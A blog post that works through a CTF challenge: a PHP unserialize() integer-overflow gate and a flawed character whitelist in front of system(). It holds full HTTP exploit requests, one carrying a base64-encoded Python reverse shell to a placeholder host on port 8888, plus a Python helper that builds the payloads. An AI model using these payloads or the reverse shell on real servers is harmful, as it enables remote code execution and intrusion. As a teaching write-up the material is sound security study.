c1ay's blog

CTF notes: a simple command-execution filter bypass

Word count: 469 | Reading time: 2 min
2021/12/30


The challenge environment is gone, so I will just paste the code. This is a problem I recently looked at for someone.

<?php
error_reporting(0);          // also hides the warning raised by the failed array append below
highlight_file(__FILE__);
class Protect{
    public $id;
}
if($protect=unserialize($_GET["bypass"])){
    // occupies array key ($protect->id + 1)
    $id[++$protect->id]=1;
    // appending needs a free key after the highest one; if that key is
    // PHP_INT_MAX the append fails and the assignment evaluates to null
    if($id[]=1){
        $protect->id+=1;
        echo $protect->id;
    }else{
        echo "success!";
        if(isset($_POST["shell"])) {
            $command = base64_decode($_POST['shell']);
            // allowed bytes: < $ space { } \ # ( ) ' 0
            $whitelists = str_split('<$ {}\\#()\'0');
            $cmd_char_list = str_split($command);
            // system() runs once per leading whitelisted byte; the first byte
            // outside the list calls die(), but only after those calls ran
            foreach($cmd_char_list as $c){
                if(in_array($c, $whitelists)){
                    system($command);
                } else {
                    die("No, No way!");
                }
            }
        }
    }
} else {
    die("Try hard!");
}
?>

Visiting the page without a usable bypass parameter only prints the die() message: Try hard!

There are two hurdles:

1. The else branch that calls system() has to be reached, which means the check if($id[]=1) must fail. An integer overflow does it: send a Protect object whose id is PHP_INT_MAX - 1 (9223372036854775806). $id[++$protect->id]=1 then occupies key PHP_INT_MAX, and $id[]=1 has no free next index, so PHP 7 raises "Cannot add element to the array as the next element is already occupied" (a warning, hidden by error_reporting(0)) and the assignment evaluates to null, which is falsy. PHP 8 turns this into a thrown Error instead, so the trick relies on the target running PHP 7.

2. Once in that branch, the command has to get past the character filter before system() runs.

Look closely at this loop:

foreach($cmd_char_list as $c){
    if(in_array($c, $whitelists)){
        system($command);
    } else {
        die("No, No way!");
    }
}

system() is called inside the loop, on the very first iteration, before the remaining bytes are even inspected. So only the first byte of the decoded command has to be in the whitelist (any of < $ space { } \ # ( ) ' 0). Each further leading whitelisted byte triggers another system() call, and the first byte outside the list calls die() only after those calls have already run.

Approach:

1. Reverse shell:

$ is whitelisted, so wrapping the payload as $(command) passes the check. In a POSIX shell $() is command substitution: the inner command runs first and its output is then treated as the command line. The base64 body below decodes to $(python -c '...') around a standard Python reverse shell connecting back to xxxx on port 8888; the substitution runs python, which is all that matters.

POST /333.php?bypass=O%3A7%3A%22Protect%22%3A1%3A%7Bs%3A2%3A%22id%22%3Bi%3A9223372036854775806%3B%7D HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
shell=JChweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCJ4eHh4Iiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsnKQ==


2. Execution with visible output when the target has no outbound connectivity:

\<||id

The leading backslash is whitelisted, so the check passes. In the shell it also changes what < means: instead of a redirection, \< is an ordinary word, so sh looks for a command literally named "<", finds none, and that first command fails with a non-zero status; || then runs id. Since the second byte (<) is whitelisted as well and the third (|) is not, system() is called twice before die("No, No way!") ends the response, so the page shows the id output followed by that message.

POST /333.php?bypass=O%3A7%3A%22Protect%22%3A1%3A%7Bs%3A2%3A%22id%22%3Bi%3A9223372036854775806%3B%7D HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
shell=XDx8fGlk
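
Putting both hurdles together, here is an added Python helper (not the challenge's or the author's code) that builds the serialized gate payload, replays the server's first-character filter so a command can be checked before sending, encodes the body, and runs the \<||id idiom through /bin/sh to show where its output comes from. The path /333.php and the probe command echo probe are assumptions; the whitelist literal and the serialized object are taken from the source above.

```python
"""Added example for the challenge above (not the challenge or author's code).

Builds the unserialize() gate payload, replays the server's first-character
filter so a command can be checked before sending, and runs the "\\<||id"
idiom through /bin/sh to show where its output comes from.  The request
path and the probe command are placeholders.
"""
import base64
import subprocess
from urllib.parse import quote

PHP_INT_MAX = 2**63 - 1          # 64-bit PHP build, as the challenge assumes

# Same literal as the PHP source, hence the same eleven bytes: < $ space { } \ # ( ) ' 0
WHITELIST = set('<$ {}\\#()\'0')


def serialize_protect(id_value: int) -> str:
    """PHP serialize() form of a Protect object with one public int property."""
    return f'O:7:"Protect":1:{{s:2:"id";i:{id_value};}}'


def passes_gate(id_value: int) -> bool:
    """Model of the if($id[]=1) gate for integer ids below PHP_INT_MAX.

    $id[++$protect->id]=1 occupies key id+1.  $id[]=1 then needs the key
    after the highest one; when id+1 is already PHP_INT_MAX there is none,
    PHP 7 warns (silenced by error_reporting(0)) and the assignment yields
    null, so the else branch runs.  Ids >= PHP_INT_MAX become floats under
    ++ and are deliberately not modelled here.
    """
    if not 0 <= id_value < PHP_INT_MAX:
        raise ValueError("only integer ids below PHP_INT_MAX are modelled")
    return id_value + 1 == PHP_INT_MAX


def simulate_filter(command: str) -> tuple:
    """Replay the foreach loop.  Returns (number of system() calls, died?).

    Nothing checks the whole command before executing it: each leading
    whitelisted byte triggers one system($command), and the first byte
    outside the list calls die() only after those calls have happened.
    """
    runs = 0
    for c in command:
        if c not in WHITELIST:
            return runs, True
        runs += 1
    return runs, False


def build_request(command: str) -> tuple:
    """Return (query string, POST body) for a command that reaches system()."""
    runs, _ = simulate_filter(command)
    if runs == 0:
        raise ValueError(f"{command!r} would be rejected: first byte is not whitelisted")
    query = "bypass=" + quote(serialize_protect(PHP_INT_MAX - 1), safe="")
    body = "shell=" + base64.b64encode(command.encode()).decode()
    return query, body


def run_in_sh(command: str) -> tuple:
    """Run a command string through /bin/sh, as system() does; returns (status, stdout)."""
    proc = subprocess.run(["/bin/sh", "-c", command], capture_output=True, text=True)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    for cmd in ("$(id)", "\\<||id", " id", "id"):
        print(repr(cmd), "->", simulate_filter(cmd))
    query, body = build_request("\\<||id")
    print("POST /333.php?" + query)        # path is an assumption
    print(body)
    # \< is looked up as a command named "<", which does not exist (status 127),
    # so || runs the right-hand side; that is the only output the response carries.
    print(run_in_sh("\\<||echo probe"))
```

simulate_filter also shows that a command starting with a plain space passes, since the space is in the whitelist, and that a command made only of whitelisted bytes is executed once per byte and never reaches die().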
